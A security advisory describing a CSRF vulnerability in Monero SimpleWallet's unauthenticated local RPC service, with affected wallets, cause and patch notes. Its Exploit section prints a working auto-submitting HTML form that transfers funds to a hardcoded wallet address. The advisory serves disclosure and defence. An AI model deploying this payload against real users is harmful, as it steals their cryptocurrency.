CSRF Vulnerability Allows for Remote Compromise of Monero Wallets
Description
Monero is a private, untraceable crypto currency. In recent weeks it has gained a lot of publicity and has risen in value significantly. It is the second most traded crypto currency this month after Bitcoin.
A Cross Site Request Forgery vulnerability was discovered in Monero Simplewallet that could give attackers the ability to remotely steal Monero from users running vulnerable wallets. Monero users must take action and update wallets to protect themselves against this attack.
Vulnerable Wallets
The following wallets use Simplewallet in RPC mode and therefore are vulnerable to this attack:
- Monero SimpleWallet - https://github.com/monero-project/monero
- Monero Lightwallet - https://github.com/jwinterm/LightWallet2/
- Monero Wallet Chrome - https://chrome.google.com/webstore/detail/monero-wallet-for-google/bddoeeocbnbkdlciahimmaciiiiadocb
- Monero GUI Client.net - https://github.com/kripod/MoneroGui.Net
- Monero JS - https://github.com/netmonk/moneronjs
- Monero NodeJS - https://github.com/PsychicCat/monero-nodejs
- Monero QT - https://github.com/Neozaru/bitmonero-qt
- Minonodo - https://github.com/ShenNoether/MiniNodo
*Note: This is not an exhaustive list, it is likely that more wallets will be affected by this issue.
Impact
An attacker could exploit this vulnerability to steal Monero from vulnerable wallets. This would involve a minimal amount of social engineering for attackers to direct users to a webpage hosting the exploit.
Cause
Monero SimpleWallet hosts an RPC web service on localhost, port 18082, the web service requires no authentication to initiate functions such as making payments, and can be compromised through a Cross Site Request Forgery attack.
Cross Site Request Forgery is an attack that forces a user’s browser to execute unwanted actions against web applications or web services they are authenticated with. In this case, by directing a user to a malicious web page, an attacker could make a payment from the user's wallet to their own wallet. Third party wallets were found to use Simplewallet in RPC mode, making the majority of third party wallets vulnerable to this attack too.
Exploit
The below script performs a Cross Site Request Forgery (CSRF) attack that would automatically steal Monero from the wallet of any user who visited the webpage.
<html>
<form action=http://127.0.0.1:18082/json_rpc method=post enctype="text/plain" name="pay" >
<input name='{"jsonrpc":"2.0","id":"0","method":"transfer","params":{"destinations":[{"amount":100000000000,"address":"49FuXtv95dkZj5aDaoWkbjQRv9Qu6UMwAAJKP68vksbpRJEPNZfkr6Ecbj9wrqG4xHAiMArmpGsxRbkmxAC8NEydBEvc162"}],"fee":000000000000,"mixin":3,"unlock_time":0,"payment_id":"","get_tx_key":true}}' type='hidden'>
</form>
<script>
document.pay.submit()
</script>
</html>
Remedial Action
Update: 20/09/16
Researcher Joseph Redfern reported that the patch for this vulnerability was disabled by default, and users are still vulnerable. To enable the patch, the "--user-agent" argument must be provided as shown in the example below.
./monero-wallet-cli --rpc-bind-port 18082 --rpc-bind-ip 127.0.0.1 --user-agent 123456randomstring
As this vulnerability is still exploitable, MWR recommends against using any third party Monero wallet, and against running Simplewallet in RPC mode.